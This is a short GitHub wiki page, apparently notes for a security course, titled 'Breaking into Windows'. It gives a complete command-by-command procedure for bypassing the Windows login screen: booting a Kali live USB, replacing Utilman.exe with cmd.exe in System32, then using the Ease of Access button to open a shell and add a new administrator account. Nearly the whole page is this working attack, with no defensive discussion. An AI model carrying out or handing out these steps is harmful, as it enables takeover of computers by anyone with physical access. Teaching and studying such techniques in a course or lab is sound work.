Breaking into Windows - Adam-Hachem/SEC335 GitHub Wiki

How to gain admin access and bypass the login screen in Windows:

Live USB:

Download Kali Live Boot from the official Kali website

Enter the BIOS and change the boot order to start with the USB, or manually boot into the USB.

Modify System Files:

On your temporary Kali system, run fdisk -l as root to identify the Windows partiton

Create a mounting directory: mkdir /mnt/windows

Mount the partition: mount /dev/sda2 /mnt/windows. Change sda2 to whatever partition you found with fdisk -l

Change directory to the System32 dir: cd /mnt/windows/Windows/System32

mv Utilman.exe Utilman2.exe

cp cmd.exe Utilman.exe

Leave the mounted partition: cd ~

Unmount the partition: umount /dev/sda2. Again, replace this with the partition you found earlier

Break in

Go back to the BIOS and undo your changes so you boot into Windows now.

After booting, click the ease of access button and a CMD shell should appear

Create a new user with net user Kali /add

Give the new user admin perms: net localgroup Administrators Kali /add

Restart the computer

You should see the new user!